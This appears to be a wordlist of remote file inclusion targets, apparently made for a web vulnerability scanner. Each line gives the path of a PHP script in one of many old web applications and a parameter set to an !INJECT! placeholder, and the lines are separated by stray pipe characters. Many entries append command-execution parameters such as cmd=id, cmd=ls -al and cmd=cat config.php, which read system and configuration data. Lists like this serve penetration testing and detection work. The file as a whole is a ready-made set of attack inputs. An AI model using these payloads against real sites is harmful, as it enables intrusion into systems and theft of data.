/modules/snf/index.php?full_path=!INJECT!
|
||||
/modules/syslog/index.php?full_path=!INJECT!
|
||||
/modules/tasks/index.php?full_path=!INJECT!
|
||||
/modules/tasks/searchsimilar.php?full_path=!INJECT!
|
||||
/modules/tasks/summary.inc.php?full_path=!INJECT!
|
||||
/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
|
||||
/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
|
||||
/modules/tml/block.tag.php?GLOBALS[PTH][classes]=!INJECT!
|
||||
/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=!INJECT!
|
||||
/modules/useradm/index.php?full_path=!INJECT!
|
||||
/modules/users/headerfile.php?system[path]=!INJECT!
|
||||
/modules/vWar_Account/includes/functions_common.php?vwar_root2=!INJECT!
|
||||
/modules/visitors2/include/config.inc.php?lvc_include_dir=!INJECT!?
|
||||
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=!INJECT!
|
||||
/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=!INJECT!
|
||||
/modules/xfsection/modify.php?dir_module=!INJECT!
|
||||
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=!INJECT!
|
||||
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
|
||||
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!?
|
||||
/modulistica/mdl_save.php?CLASSPATH=!INJECT!
|
||||
/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
|
||||
/moodle/admin/utfdbmigrate.php?cmd=!INJECT!
|
||||
/moosegallery/display.php?type=!INJECT!?&cmd=[command]
|
||||
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=!INJECT!
|
||||
/moteur/moteur.php?chemin=!INJECT!?
|
||||
/movie_cls.php?full_path=!INJECT!
|
||||
/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
|
||||
/music/buycd.php?HTTP_DOCUMENT_ROOT=!INJECT!?
|
||||
/mutant_includes/mutant_functions.php?phpbb_root_path=!INJECT!
|
||||
/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=!INJECT!
|
||||
/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=!INJECT!
|
||||
/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
|
||||
/myphpcommander_path/system/lib/package.php?gl_root=!INJECT!?cmd
|
||||
/mysave.php?file=!INJECT!
|
||||
/naboard_pnr.php?skin=!INJECT!?
|
||||
/ncaster/admin/addons/archive/archive.php?adminfolder=!INJECT!
|
||||
/network_module_selector.php?path_prefix=!INJECT!
|
||||
/news.php?CONFIG[script_path]=!INJECT!?
|
||||
/news.php?config[root_ordner]=!INJECT!?&cmd=id
|
||||
/news.php?scriptpath=!INJECT!?
|
||||
/news.php?vwar_root=!INJECT!
|
||||
/news/include/createdb.php?langfile;=!INJECT!?
|
||||
/news/include/customize.php?l=!INJECT!?
|
||||
/news/newstopic_inc.php?indir=!INJECT!
|
||||
/news/scripts/news_page.php?script_path=!INJECT!?
|
||||
/newsadmin.php?action=!INJECT!
|
||||
/newsarchive.php?path_to_script=!INJECT!?&cmd=ls
|
||||
/newsfeeds/includes/aggregator.php?zf_path=!INJECT!
|
||||
/newsfeeds/includes/controller.php?zf_path=!INJECT!
|
||||
/newsletter/newsletter.php?waroot=!INJECT!
|
||||
/newsp/lib/class.Database.php?path=!INJECT!?
|
||||
/newticket.php?lang=!INJECT!
|
||||
/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=!INJECT!
|
||||
/noticias.php?inc=!INJECT!?
|
||||
/nucleus/plugins/skinfiles/index.php?DIR_LIBS=!INJECT!
|
||||
/nuke_path/iframe.php?file=!INJECT!
|
||||
/nukebrowser.php?filnavn=!INJECT!&filhead=!INJECT!&cmd=id
|
||||
/nuseo/admin/nuseo_admin_d.php?nuseo_dir=!INJECT!?
|
||||
/oaboard_en/forum.php?inc=!INJECT!
|
||||
/ocp-103/index.php?req_path=!INJECT!
|
||||
/ocs/include/footer.inc.php?fullpath=!INJECT!?
|
||||
/ocs/include/theme.inc.php?fullpath=!INJECT!?
|
||||
/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=!INJECT!?
|
||||
/olbookmarks-0.7.4/themes/test1.php?!INJECT!
|
||||
/oneadmin/adminfoot.php?path[docroot]=!INJECT!
|
||||
/oneadmin/blogger/sampleblogger.php?path[docroot]=!INJECT!?
|
||||
/oneadmin/config-bak.php?include_once=!INJECT!
|
||||
/oneadmin/config.php?path[docroot]=!INJECT!
|
||||
/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=!INJECT!?
|
||||
/online.php?config[root_ordner]=!INJECT!?&cmd=id
|
||||
/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=!INJECT!?
|
||||
/openi-admin/base/fileloader.php?config[openi_dir]=!INJECT!
|
||||
/openrat/themes/default/include/html/insert.inc.php?tpl_dir=!INJECT!???
|
||||
/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=!INJECT!
|
||||
/ops/gals.php?news_file=!INJECT!
|
||||
/order/login.php?svr_rootscript=!INJECT!
|
||||
/osData/php121/php121db.php?php121dir=!INJECT!%00
|
||||
/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=!INJECT!?
|
||||
/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=!INJECT!?
|
||||
/owimg.php3?path=!INJECT!
|
||||
/p-news.php?pn_lang=!INJECT!
|
||||
/pafiledb/includes/pafiledb_constants.php?module_root_path=!INJECT!
|
||||
/page.php?goto=!INJECT!
|
||||
/page.php?id=!INJECT!
|
||||
/panel/common/theme/default/header_setup.php?path[docroot]=!INJECT!
|
||||
/param_editor.php?folder=!INJECT!?
|
||||
/parse/parser.php?WN_BASEDIR=!INJECT!
|
||||
/patch/?language_id=!INJECT!
|
||||
/patch/tools/send_reminders.php?noSet=0&includedir=!INJECT!?
|
||||
/paypalipn/ipnprocess.php?INC=!INJECT!?
|
||||
/pda/pda_projects.php?offset=!INJECT!
|
||||
/phfito/phfito-post?SRC_PATH=!INJECT!
|
||||
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=!INJECT!
|
||||
/photo_comment.php?toroot=!INJECT!
|
||||
/php-inc/log.inc.php?SKIN_URL=!INJECT!
|
||||
/php-include-robotsservices.php?page=!INJECT!
|
||||
/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
|
||||
/php.incs/common.inc.php?cm_basedir=!INJECT!?
|
||||
/php/init.gallery.php?include_class=!INJECT!/something
|
||||
/php121db.php?php121dir=!INJECT!%00
|
||||
/php4you.php?dir=!INJECT!?
|
||||
/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=!INJECT!?
|
||||
/phpBB2/shoutbox.php?phpbb_root_path=!INJECT!
|
||||
/phpCards.header.php?CardPath=!INJECT!?
|
||||
/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
|
||||
/phpMyChat.php3?=!INJECT!?cmd=id
|
||||
/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=!INJECT!?
|
||||
/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=!INJECT!?
|
||||
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
|
||||
/phpbb/sendmsg.php?phpbb_root_path=!INJECT!
|
||||
/phpcalendar/includes/calendar.php?phpc_root_path=!INJECT!?
|
||||
/phpcalendar/includes/setup.php?phpc_root_path=!INJECT!?
|
||||
/phpdebug_PATH/test/debug_test.php?debugClassLocation=!INJECT!
|
||||
/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=!INJECT!
|
||||
/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=!INJECT!
|
||||
/phphd_downloads/common.php?phphd_real_path=!INJECT!
|
||||
/phphost_directoryv2/include/admin.php?rd=!INJECT!?
|
||||
/phphtml.php?htmlclass_path=!INJECT!
|
||||
/phpi/edit_top_feature.php?include_connection=!INJECT!
|
||||
/phpi/edit_topics_feature.php?include_connection=!INJECT!
|
||||
/phplib/site_conf.php?ordnertiefe=!INJECT!
|
||||
/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/module/referenz.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=!INJECT!
|
||||
/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=!INJECT!
|
||||
/phplinks/includes/smarty.php?full_path_to_public_program=!INJECT!
|
||||
/phporacleview/inc/include_all.inc.php?page_dir=!INJECT!?
|
||||
/phppc/poll.php?is_phppc_included=1&relativer_pfad=!INJECT!?
|
||||
/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=!INJECT!?
|
||||
/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=!INJECT!?
|
||||
/phpquickgallery/gallery_top.inc.php?textFile=!INJECT!
|
||||
/phpreactor/inc/polls.inc.php?pathtohomedir=!INJECT!?
|
||||
/phpreactor/inc/updatecms.inc.php?pathtohomedir=!INJECT!?
|
||||
/phpreactor/inc/users.inc.php?pathtohomedir=!INJECT!?
|
||||
/phpreactor/inc/view.inc.php?pathtohomedir=!INJECT!?
|
||||
/phpress/adisplay.php?lang=!INJECT!
|
||||
/phpunity-postcard.php?plgallery_epost=1&gallery_path=!INJECT!?
|
||||
/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=!INJECT!
|
||||
/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=!INJECT!
|
||||
/phpyabs/moduli/libri/index.php?Azione=!INJECT!
|
||||
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=!INJECT!
|
||||
/playlist.php?phpbb_root_path=!INJECT!
|
||||
/plugin/HP_DEV/cms2.php?s_dir=!INJECT!?
|
||||
/plugin/gateway/gnokii/init.php?apps_path[plug]=!INJECT!?
|
||||
/plugins/1_Adressbuch/delete.php?folder=!INJECT!
|
||||
/plugins/BackUp/Archive.php?bkpwp_plugin_path=!INJECT!?
|
||||
/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=!INJECT!?
|
||||
/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=!INJECT!?
|
||||
/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=!INJECT!?
|
||||
/plugins/links/functions.inc?_CONF[path]=!INJECT!
|
||||
/plugins/polls/functions.inc?_CONF[path]=!INJECT!
|
||||
/plugins/rss_importer_functions.php?sitepath=!INJECT!?
|
||||
/plugins/safehtml/HTMLSax3.php?dir[plugins]=!INJECT!?
|
||||
/plugins/safehtml/safehtml.php?dir[plugins]=!INJECT!?
|
||||
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/Import.Admin.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=!INJECT!
|
||||
/plugins/staticpages/functions.inc?_CONF[path]=!INJECT!
|
||||
/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=!INJECT!
|
||||
/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=!INJECT!
|
||||
/plus.php?_pages_dir=!INJECT!?
|
||||
/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=!INJECT!?
|
||||
/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!
|
||||
/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!?
|
||||
/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/login.php?absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=!INJECT!
|
||||
/podcastgen1.0beta2/core/recent_list.php?absoluteurl=!INJECT!
|
||||
/poll/view.php?int_path=!INJECT!
|
||||
/pollvote.php?pollname=!INJECT!?&cmd=ls
|
||||
/pop.php?base=!INJECT!
|
||||
/popup_window.php?site_isp_root=!INJECT!?
|
||||
/port.php?content=!INJECT!
|
||||
/portal/includes/portal_block.php?phpbb_root_path=!INJECT!
|
||||
/portal/portal.php?phpbb_root_path=!INJECT!?
|
||||
/portfolio.php?id=!INJECT!
|
||||
/portfolio/commentaires/derniers_commentaires.php?rep=!INJECT!?
|
||||
/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=!INJECT!
|
||||
/prepare.php?xcart_dir=!INJECT!?
|
||||
/prepend.php?_PX_config[manager_path]=!INJECT!
|
||||
/preview.php?php_script_path=!INJECT!?&cmd=dir
|
||||
/principal.php?conteudo=!INJECT!
|
||||
/print.php?page=!INJECT!
|
||||
/print.php?pager=!INJECT!
|
||||
/print.php?print=!INJECT!?
|
||||
/process.php?DEFAULT_SKIN=!INJECT!
|
||||
/professeurs/index.php?repertoire_config=!INJECT!
|
||||
/profil.php?config[root_ordner]=!INJECT!?&cmd=id
|
||||
/projects/weatimages/demo/index.php?ini[langpack]=!INJECT!
|
||||
/promocms/newspublish/include.php?path[bdocroot]=!INJECT!
|
||||
/protection.php?logout_page=!INJECT!?
|
||||
/provider/auth.php?xcart_dir=!INJECT!?
|
||||
/psynch/nph-psa.exe?css=!INJECT!
|
||||
/psynch/nph-psf.exe?css=!INJECT!
|
||||
/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=!INJECT!?
|
||||
/public_html/modules/Forums/favorites.php?nuke_bb_root_path=!INJECT!?
|
||||
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=!INJECT!
|
||||
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=!INJECT!
|
||||
/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=!INJECT!?
|
||||
/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=!INJECT!?
|
||||
/qte_web.php?qte_web_path=!INJECT!?
|
||||
/quick_reply.php?phpbb_root_path=!INJECT!&mode=[file]
|
||||
/quickie.php?QUICK_PATH=!INJECT!?&cmd=id
|
||||
/random2.php?path_to_folder=!INJECT!
|
||||
/randshop/index.php?incl=!INJECT!?
|
||||
/rdf.php?page[path]=!INJECT!?&cmd=ls
|
||||
/reactivate.php?base_dir=!INJECT!
|
||||
/read.php?data=!INJECT!?
|
||||
/readmore.php?config["sipssys"]=!INJECT!
|
||||
/recent.php?insPath=!INJECT!
|
||||
/rechnung.php?_PHPLIB[libdir]=!INJECT!?
|
||||
/reconfig.php?GLOBALS[CLPath]=!INJECT!
|
||||
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=!INJECT!
|
||||
/redirect.php?url=!INJECT!
|
||||
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=!INJECT!
|
||||
/register.php?base_dir=!INJECT!
|
||||
/releasenote.php?mosConfig_absolute_path=!INJECT!
|
||||
/rempass.php?lang=!INJECT!
|
||||
/report.php?scriptpath=!INJECT!?
|
||||
/reports/who_r.php?bj=!INJECT!
|
||||
/resources/includes/class.Smarty.php?cfg[sys][base_path]=!INJECT!
|
||||
/ressourcen/dbopen.php?home=!INJECT!?
|
||||
/robotstats.inc.php?DOCUMENT_ROOT=!INJECT!?
|
||||
/root/public/code/cp_html2txt.php?page=!INJECT!
|
||||
/routines/fieldValidation.php?jssShopFileSystem=!INJECT!
|
||||
/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!
|
||||
/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!?
|
||||
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!
|
||||
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!?
|
||||
/rss.php?page[path]=!INJECT!?&cmd=ls
|
||||
/rss.php?phpraid_dir=!INJECT!
|
||||
/rss.php?premodDir=!INJECT!
|
||||
/rss2.php?page[path]=!INJECT!?&cmd=ls
|
||||
/run.php?dir=SHELL?&file=!INJECT!
|
||||
/s01.php?shopid=!INJECT!
|
||||
/s01.php?shopid=!INJECT!?
|
||||
/s02.php?shopid=!INJECT!?
|
||||
/s03.php?shopid=!INJECT!?
|
||||
/s04.php?shopid=!INJECT!?
|
||||
/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=!INJECT!
|
||||
/sablonlar/gunaysoft/gunaysoft.php?sayfaid=!INJECT!
|
||||
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!
|
||||
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!?
|
||||
/sample/xls2mysql/parser_path=!INJECT!?
|
||||
/save.php?file_save=!INJECT!
|
||||
/saveserver.php?thisdir=!INJECT!
|
||||
/script//ident/index.php?path_inc=!INJECT!
|
||||
/script/_conf/core/common-tpl-vars.php?confdir=!INJECT!?
|
||||
/script/common.inc.php?path_inc=!INJECT!
|
||||
/script/gestion/index.php?path_inc=!INJECT!
|
||||
/script/ident/disconnect.php?path_inc=!INJECT!
|
||||
/script/ident/ident.inc.php?path_inc=!INJECT!
|
||||
/script/ident/identification.php?path_inc=!INJECT!
|
||||
/script/ident/loginliste.php?path_inc=!INJECT!
|
||||
/script/ident/loginmodif.php?path_inc=!INJECT!
|
||||
/script/index.php?path_inc=!INJECT!
|
||||
/script/init/createallimagecache.php?PATH_TO_CODE=!INJECT!
|
||||
/script/menu/menuadministration.php?path_inc=!INJECT!
|
||||
/script/menu/menuprincipal.php?path_inc=!INJECT!
|
||||
/script/param/param.inc.php?path_inc=!INJECT!
|
||||
/script/plugins/phpgacl/admin/index.php?path_inc=!INJECT!
|
||||
/script/template/index.php?main_page_directory=!INJECT!
|
||||
/script/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
|
||||
/script/tick/test.php?PATH_TO_CODE=!INJECT!
|
||||
/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=!INJECT!?
|
||||
/script_path/cms/classes/openengine/filepool.php?oe_classpath=!INJECT!?
|
||||
/script_path/installation/index.php?mosConfig_absolute_path=!INJECT!?
|
||||
/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=!INJECT!
|
||||
/scripts/check-lom.php?ETCDIR=!INJECT!
|
||||
/scripts/gallery.scr.php?GLOBALS[PTH][func]=!INJECT!?
|
||||
/scripts/lom_update.php?ETCDIR=!INJECT!
|
||||
/scripts/news.scr.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/scripts/polls.scr.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/scripts/rss.scr.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/scripts/search.scr.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!
|
||||
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/scripts/weigh_keywords.php?ETCDIR=!INJECT!
|
||||
/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=!INJECT!?
|
||||
/search.php?config["sipssys"]=!INJECT!
|
||||
/search.php?id=!INJECT!
|
||||
/search.php?insPath=!INJECT!
|
||||
/search/submit.php?config["sipssys"]=!INJECT!
|
||||
/search_wA.php?LIBPATH=!INJECT!
|
||||
/searchbot.php?path=!INJECT!
|
||||
/security/include/_class.security.php?PHPSECURITYADMIN_PATH=!INJECT!
|
||||
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=!INJECT!?
|
||||
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=!INJECT!?
|
||||
/senetman/html/index.php?page=!INJECT!
|
||||
/services.php?page=!INJECT!
|
||||
/services/samples/inclusionService.php?CabronServiceFolder=!INJECT!%00
|
||||
/settings.php?P[includes]=!INJECT!
|
||||
/settings_sql.php?path=!INJECT!
|
||||
/setup/inc/database.php?tcms_administer_site=!INJECT!
|
||||
/setup/upgrader.php?RootDirectory=!INJECT!
|
||||
/sezhoo/SezHooTabsAndActions.php?IP=!INJECT!
|
||||
/shop/includes/header.inc.php?dateiPfad=!INJECT!
|
||||
/shop/index.php?action=!INJECT!?&cmd=cat%20config.php
|
||||
/shop/page.php?osCsid=!INJECT!?
|
||||
/shop/page.php?pageid=!INJECT!?
|
||||
/shoutbox.php?language=!INJECT!
|
||||
/shoutbox.php?root=!INJECT!?cmd=id
|
||||
/show.php?file=!INJECT!
|
||||
/show.php?id=!INJECT!
|
||||
/show.php?page=!INJECT!
|
||||
/show.php?path=!INJECT!
|
||||
/show_archives.php?cutepath=!INJECT!?
|
||||
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=!INJECT!
|
||||
/sid=!INJECT!
|
||||
/signer/final.php?smiley=!INJECT!?
|
||||
/signin.php?sent=1&AMG_serverpath=!INJECT!
|
||||
/sinagb.php?fuss=!INJECT!
|
||||
/sinapis.php?fuss=!INJECT!
|
||||
/sitebar/Integrator.php?file=!INJECT!
|
||||
/sitebar/index.php?writerFile=!INJECT!
|
||||
/sitebuilder/admin/top.php?admindir=!INJECT!
|
||||
/sitemap.xml.php?dir[classes]=!INJECT!
|
||||
/skin/board/default/doctype.php?dir=!INJECT!
|
||||
/skin/dark/template.php?path=!INJECT!
|
||||
/skin/gold/template.php?path=!INJECT!
|
||||
/skin/html/table.php?pachtofile=!INJECT!
|
||||
/skin/original/template.php?path=!INJECT!
|
||||
/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=!INJECT!
|
||||
/skins/advanced/advanced1.php?pluginpath[0]=!INJECT!
|
||||
/skins/default.php?dir_inc=!INJECT!
|
||||
/skins/header.php?ote_home=!INJECT!
|
||||
/skins/phpchess/layout_admin_cfg.php?Root_Path=!INJECT!
|
||||
/skins/phpchess/layout_cfg.php?Root_Path=!INJECT!
|
||||
/skins/phpchess/layout_t_top.php?Root_Path=!INJECT!
|
||||
/skysilver/login.tpl.php?theme=!INJECT!?
|
||||
/slogin_lib.inc.php?slogin_path=!INJECT!?
|
||||
/smarty.php?xcart_dir=!INJECT!?
|
||||
/smarty/smarty_class.php?_smarty_compile_path=!INJECT!
|
||||
/smilies.php?config=!INJECT!
|
||||
/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!?
|
||||
/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=!INJECT!?
|
||||
/snort/base_stat_common.php?BASE_path=!INJECT!
|
||||
/social_game_play.php?path=!INJECT!?
|
||||
/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=!INJECT!
|
||||
/song.php?phpbb_root_path=!INJECT!
|
||||
/source.php?bibtexrootrel=!INJECT!?
|
||||
/source/mod/rss/channeledit.php?Codebase=!INJECT!
|
||||
/source/mod/rss/post.php?Codebase=!INJECT!
|
||||
/source/mod/rss/view.php?Codebase=!INJECT!
|
||||
/source/mod/rss/viewitem.php?Codebase=!INJECT!
|
||||
/sources/Admin/admin_cats.php?CONFIG[main_path]=!INJECT!
|
||||
/sources/Admin/admin_edit.php?CONFIG[main_path]=!INJECT!
|
||||
/sources/Admin/admin_import.php?CONFIG[main_path]=!INJECT!
|
||||
/sources/Admin/admin_templates.php?CONFIG[main_path]=!INJECT!
|
||||
/sources/functions.php?CONFIG[main_path]=!INJECT!
|
||||
/sources/help.php?CONFIG[main_path]=!INJECT!
|
||||
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=!INJECT!
|
||||
/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=!INJECT!
|
||||
/sources/mail.php?CONFIG[main_path]=!INJECT!
|
||||
/sources/misc/new_day.php?path=!INJECT!
|
||||
/sources/news.php?CONFIG[main_path]=!INJECT!
|
||||
/sources/post.php?fil_config=!INJECT!
|
||||
/sources/template.php?CONFIG[main_path]=!INJECT!
|
||||
/sources/tourney/index.php?page=!INJECT!?
|
||||
/spaw/spaw_control.class.php?GLOBALS[spaw_root]=!INJECT!
|
||||
/spaw/spaw_control.class.php?spaw_root=!INJECT!
|
||||
/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=!INJECT!
|
||||
/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
|
||||
/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
|
||||
/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=!INJECT!
|
||||
/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=!INJECT!
|
||||
/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=!INJECT!
|
||||
/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=!INJECT!
|
||||
/spellcheckwindowframeset.php?SpellIncPath=!INJECT!
|
||||
/squirrelcart/cart_content.php?cart_isp_root=!INJECT!
|
||||
/src/ark_inc.php?cfg_pear_path=!INJECT!?
|
||||
/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=!INJECT!
|
||||
/src/scripture.php?pageHeaderFile=!INJECT!?
|
||||
/starnet/themes/c-sky/main.inc.php?cmsdir=!INJECT!?
|
||||
/start.php?lang=!INJECT!
|
||||
/start.php?pg=!INJECT!
|
||||
/stat_modules/users_age/module.php?phpbb_root_path=!INJECT!
|
||||
/stats.php?vwar_root=!INJECT!
|
||||
/stphpapplication.php?STPHPLIB_DIR=!INJECT!
|
||||
/stphpbtnimage.php?STPHPLIB_DIR=!INJECT!
|
||||
/stphpform.php?STPHPLIB_DIR=!INJECT!
|
||||
/str.php?p=!INJECT!
|
||||
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!
|
||||
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!?
|
||||
/strload.php?LangFile=!INJECT!
|
||||
/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=!INJECT!?
|
||||
/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=!INJECT!?
|
||||
/styles.php?toroot=!INJECT!
|
||||
/styles/default/global_header.php?installed=23&domain=!INJECT!
|
||||
/submit_abuse.php?path_prefix=!INJECT!
|
||||
/submit_comment.php?path_prefix=!INJECT!
|
||||
/subscp.php?phpbb_root_path=!INJECT!?
|
||||
/suite/index.php?pg=!INJECT!?
|
||||
/supasite/admin_auth_cookies.php?supa[db_path]=!INJECT!
|
||||
/supasite/admin_mods.php?supa[db_path]=!INJECT!
|
||||
/supasite/admin_news.php?supa[db_path]=!INJECT!
|
||||
/supasite/admin_settings.php?supa[include_path]=!INJECT!
|
||||
/supasite/admin_topics.php?supa[db_path]=!INJECT!
|
||||
